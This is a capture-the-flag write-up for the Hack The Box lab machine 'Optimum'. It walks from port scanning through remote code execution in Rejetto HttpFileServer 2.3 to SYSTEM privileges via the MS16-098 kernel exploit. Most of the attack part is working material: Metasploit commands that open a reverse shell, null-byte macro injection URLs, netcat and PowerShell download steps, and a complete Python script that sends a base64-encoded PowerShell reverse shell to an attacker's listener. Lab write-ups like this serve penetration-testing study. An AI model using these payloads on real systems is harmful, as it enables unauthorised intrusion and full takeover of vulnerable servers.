Optimum write-up
Ανάλυση του Optimum
Enumeration
Port scanning
We scan the full range of TCP ports using masscan (Why masscan? Because it’s faster than nmap)
$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2017-10-10 09:58:16 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 10.10.10.8
We found TCP port 80 open. Let’s explore it using nmap:
$ sudo nmap -A -p80 10.10.10.8
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-10 13:10 EEST
Nmap scan report for 10.10.10.8
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We scan only the 1000 most common UDP ports using nmap because UDP scanning it’s very slow.
$ sudo nmap -sU --top-ports 1000 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.075s latency).
All 1000 scanned ports on 10.10.10.8 are open|filtered
Exploitation
So, we have found that Rejetto HttpFileServer 2.3 is running on TCP port 80. Let’s see if there are some exploits for it:
$ searchsploit rejetto 2.3 -w
-------------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload
https://www.exploit-db.com/exploits/30850/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
https://www.exploit-db.com/exploits/34668/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
https://www.exploit-db.com/exploits/39161/
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution
https://www.exploit-db.com/exploits/34852/
-------------------------------------------------------------------------
Nice! There are some RCE exploits! :D
An issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer; begin result:=reMatch(s, ‘{[.:]|[.:]}||‘, ’m!’, ofs) end;
It will not handle null byte:
http://localhost:80/?search=%00{.exec|cmd.}
So the above request will stop regex from parsing macro, macro will be executed and remote code injection will happen. The exploit basically allow you to run commands like this:
http://10.10.10.8/?search=%00{.exec|C:\windows\system32\cmd.exe /c echo hello > test.}
You can also upload/save a file like that:
http://10.10.10.8/?search=%00{.save|fullpath\filename|data.}
Using Metasploit
$ msfconsole
msf > search name:rejetto
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(rejetto_hfs_exec) > set RPORT 80
msf exploit(rejetto_hfs_exec) > set SRVHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set SRVPORT 60000
msf exploit(rejetto_hfs_exec) > info
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 20 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.10.10.8 yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 10.10.15.150 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 60000 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpset
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set LPORT 60001
msf exploit(rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.150:60001
[*] Using URL: http://10.10.15.150:60000/uT3OPJWDAW7b3s
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /uT3OPJWDAW7b3s
[*] Sending stage (205379 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.15.150:60001 -> 10.10.10.8:49264) at 2017-10-10 13:44:11 +0300
[!] Tried to delete %TEMP%\IJOurNACYIxzs.vbs, unknown result
[*] Server stopped.
Now we’ve got a low privilege shelll as user Kostas:
C:\Users\kostas\Desktop> whoami
OPTIMUM\kostas
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 97
Meterpreter : x64/windows
Privilege Escalation
Let’s search for privilege escalation exploits:
$ git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
$ cd Windows-Exploit-Suggester/
$ python2 windows-exploit-suggester.py --update
We feed in windows-exploit-suggester.py an input file that contains the output from the ‘systeminfo’ command:
meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"
Yes I know that ‘execute’ has a separate parameter -a to pass the arguments :P. But it also works like that and this scheme is actually clearer. You can also run ‘shell’ and execute ‘systeminfo > systeminfo.txt’. It’s the same thing.
meterpreter > download systeminfo.txt
$ cat systeminfo.txt
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ££
System Boot Time: 16/10/2017, 9:20:08 ££
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 2.556 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 3.303 MB
Virtual Memory: In Use: 2.200 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
I use the –quiet option to get more compact results. If you want to get more info like links for the exploits remove it:
$ python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-2)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
Quite a few exploits. I tried some and I know that the 2nd one (MS16-098) works. The 6th one (MS16-032) works too but it’s a pain in the ass if you don’t set the correct architecture from start to end. Even if you have the correct architecture -in some metasploit configurations- this exploit doesn’t work correctly.
We download the -less troublesome, more reliable- exploit “Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)” from here: https://www.exploit-db.com/exploits/41020/
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
meterpreter > upload 41020.exe
meterpreter > shell
C:\Users\kostas\Desktop>41020.exe
[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017
Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop> whoami
nt authority\system :D
Without Metasploit
(Look Mom! No metasploit! :P )
Using python and netcat
We download the python script from here: https://www.exploit-db.com/exploits/39161/
Usage is : python exploit.py RHOST RPORT (Don’t forget to change the Local IP address and Port number inside the script).
We need to host netcat (http://attackers_ip:80/nc.exe) using a web server.
$ mkdir http && cd http
$ wget https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/exe/nc.exe
$ sudo python2 -m SimpleHTTPServer 80
$ nc -lvp 60001
Make sure you have changed the local IP and port inside the script and run:
$ python2 39161.py 10.10.10.8 80
listening on [any] 60001 ...
10.10.10.8: inverse host lookup failed:
connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49216
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>
$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
C:\Users\kostas\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
C:\Users\kostas\Desktop> 41020.exe
[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017
Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop> whoami
nt authority\system :D
Using python and powershell
Do we really need to upload nc.exe? Not really. We have powershell on the box.
#!/usr/bin/env python2
# Author: Alamot
import sys
import urllib, urllib2
from base64 import b64encode
if (len(sys.argv) < 5):
print("usage: <RHOST> <RPORT> <LHOST> <LPORT>")
exit()
RHOST = sys.argv[1]
RPORT = sys.argv[2]
LHOST = sys.argv[3]
LPORT = sys.argv[4]
print("RHOST="+RHOST+" RPORT="+RPORT+" LHOST="+LHOST+" LPORT="+LPORT+'\n')
payload = "$client = New-Object System.Net.Sockets.TCPClient('"+LHOST+"',"+LPORT+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"
print(payload+'\n')
b64enc_command = b64encode(payload.encode('UTF-16LE')).replace('+','%2b')
url = "http://"+RHOST+":"+RPORT+"/?search=%00{.exec%7CC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe%20-EncodedCommand%20"+b64enc_command+".}"
print(url)
response = urllib2.urlopen(url)
print("\nSTATUS: "+str(response.getcode()))
Let’s run the above python script.
$ nc -lvp 60002
listening on [any] 60002 ...
$ python send_powershell_payload.py 10.10.10.8 80 LHOST 60002
connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49258
PS C:\Users\kostas\Desktop>